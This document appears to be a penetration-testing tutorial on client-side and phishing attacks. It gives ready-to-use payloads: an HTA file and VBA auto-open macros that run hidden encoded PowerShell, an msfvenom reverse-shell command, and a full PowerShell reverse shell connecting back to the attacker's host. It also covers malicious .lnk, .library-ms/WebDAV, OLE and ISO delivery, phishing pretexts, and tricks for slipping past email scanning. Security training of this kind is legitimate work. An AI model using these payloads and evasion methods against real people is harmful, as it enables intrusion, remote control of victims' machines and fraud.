Client-Side & Phishing Attacks
Client-side attacks target the user rather than the server. Instead of exploiting a network service directly, you deliver a payload that the victim executes — through a malicious document, link, or file.
# Set environment variables
export TARGET=<ip>
export LHOST=<your-ip>
export LPORT=4444
Reconnaissance for Client-Side Attacks
Before crafting a payload, gather information about the target's environment:
Identify the Target's Software
Enumerate the client OS, browser, and installed applications from metadata, HTTP headers, or social engineering. Key things to look for:
- Operating system and version (Windows 10/11, macOS)
- Browser (Chrome, Firefox, Edge)
- Office suite version (Microsoft 365, Office 2019, LibreOffice)
- Email client
- PDF reader
Passive Fingerprinting
Examine metadata from publicly available documents (PDFs, Office files) published by the target organization:
exiftool document.pdf
Metadata often reveals: software versions, usernames, operating system, directory paths, and internal hostnames.
HTA (HTML Application) Attacks
HTA files are HTML applications that run with the permissions of the user — outside the browser sandbox. They execute via mshta.exe, a trusted Windows binary.
Basic HTA Reverse Shell
Create a file named payload.hta:
<html>
<head>
<script language="VBScript">
Sub RunPayload()
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -nop -w hidden -e <base64-payload>", 0
End Sub
RunPayload
</script>
</head>
<body>
<p>Loading document, please wait...</p>
</body>
</html>
Host and deliver:
python3 -m http.server 80
# Victim visits: http://$LHOST/payload.hta
msfvenom HTA Payload
Generate an HTA file directly:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f hta-psh -o payload.hta
Modern browsers will warn users about HTA downloads. This attack is most effective when delivered via email attachment or through social engineering that convinces the user to "Save and Open" the file.
Microsoft Office Macro Attacks
Office macros (VBA) are a classic client-side attack vector. When the victim opens a document and enables macros, arbitrary code executes.
Basic VBA Reverse Shell Macro
Open Word or Excel, go to View → Macros → Create. Paste this VBA code:
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell -nop -w hidden -e <base64-payload>"
CreateObject("Wscript.Shell").Run str, 0
End Sub
AutoOpen() triggers when the document is opened in Word. Document_Open() is an alternative trigger. Both are included for reliability.
Save the document as .doc (Word 97-2003 format) or .docm (macro-enabled). The .doc format is less suspicious to users.
Generating the Base64 Payload
Create the PowerShell reverse shell and encode it:
echo -n '$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t UTF-16LE | base64 -w 0
Replace LHOST and LPORT with actual values before encoding.
VBA String Length Limitation
VBA has a maximum string literal length. For long payloads, split the string across multiple lines:
Sub MyMacro()
Dim str As String
str = "powershell -nop -w hidden -e "
str = str + "JABjAGwAaQBlAG4AdAAgAD0AIABOAG"
str = str + "UAdwAtAE8AYgBqAGUAYwB0ACAAUwB5"
str = str + "AHMAdABlAG0ALgBOAGUAdAAuAFMAbw"
' ... continue splitting
CreateObject("Wscript.Shell").Run str, 0
End Sub
A Python script to auto-split the base64 string into VBA-friendly lines:
import sys
payload = sys.argv[1]
n = 50
chunks = [payload[i:i+n] for i in range(0, len(payload), n)]
for i, chunk in enumerate(chunks):
if i == 0:
print(f' str = "{chunk}"')
else:
print(f' str = str + "{chunk}"')
OLE Object Embedding
Embed executable files inside Office documents as OLE objects. When the victim double-clicks the embedded object, it executes.
Embedding a Batch File in Word
- Create a batch file (
payload.bat) that downloads and runs your reverse shell - In Word: Insert → Object → Create from File → select
payload.bat - Check "Display as icon" and change the icon to something believable (e.g., a PDF icon)
- Save and deliver the document
The victim sees what looks like an embedded PDF — double-clicking it runs the batch file.
Windows Library Files (.library-ms)
Library files define a virtual folder that aggregates content from multiple locations — including WebDAV shares. If you host a WebDAV server with malicious shortcuts, opening the library file mounts it automatically.
Setup WebDAV Server
pip install wsgidav --break-system-packages
mkdir /home/kali/webdav
# Place a malicious .lnk shortcut in the directory
wsgidav --host=0.0.0.0 --port=80 --root /home/kali/webdav --auth=anonymous
Create Library File
Create Documents.library-ms:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://LHOST</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Replace LHOST with your WebDAV server IP.
Create Malicious Shortcut (.lnk)
On a Windows machine, create a shortcut with this target:
powershell.exe -nop -w hidden -e <base64-payload>
Change the shortcut icon to something inconspicuous (a folder icon, document icon, etc.). Place it in the WebDAV directory.
When the victim opens the .library-ms file, Windows mounts the WebDAV share and displays the shortcut. Clicking it runs the payload.
Pretexting and Delivery
The technical payload is only half the attack. Delivery and social engineering determine whether the victim actually opens it.
Effective Pretexts
- Invoice or purchase order requiring review
- Shared document from a colleague (especially after recon identifies real names)
- IT department requesting action (password reset, software update)
- Resume submission (for HR departments)
- Legal document requiring signature
Delivery Methods
Email attachment — most common; effectiveness depends on email security controls (SPF, DKIM, DMARC, attachment scanning).
Link to hosted payload — host the file on a plausible-looking domain and link to it in the email. Less likely to be caught by attachment scanners.
USB drop — place USB drives in parking lots or common areas. Preload with autorun payloads or enticing filenames. Works well in physical engagements.
Bypassing Email Security
- Use
.docinstead of.docm(less commonly blocked) - Password-protect the document and include the password in the email body (prevents automated scanning)
- Use cloud storage links (OneDrive, Google Drive, Dropbox) instead of direct attachments
- ZIP the payload with a password
If macro-enabled documents are blocked by the target's email gateway, consider alternative payload formats: .hta, .url, .lnk, .iso (mounts as a drive on Windows 10+), or .vhd files. Each has different detection rates.
Payload Delivery via File Formats
Windows Shortcut Files (.lnk)
Create a shortcut that executes PowerShell when clicked:
Target: powershell.exe -nop -w hidden -e <base64-payload>
Start in: C:\Windows\System32
Icon: Change to a PDF or folder icon
ISO/IMG Files
ISO files mount automatically on Windows 10+ when double-clicked. Files inside the ISO are not subject to Mark-of-the-Web (MOTW) protections, which means macros inside documents within an ISO won't trigger the "Protected View" warning.
Create an ISO containing your malicious document:
mkisofs -o payload.iso -J -R /path/to/malicious/files/
As of late 2022, Microsoft has started propagating MOTW to files within ISO containers, reducing the effectiveness of this technique on fully patched systems. Always test against the target's patch level.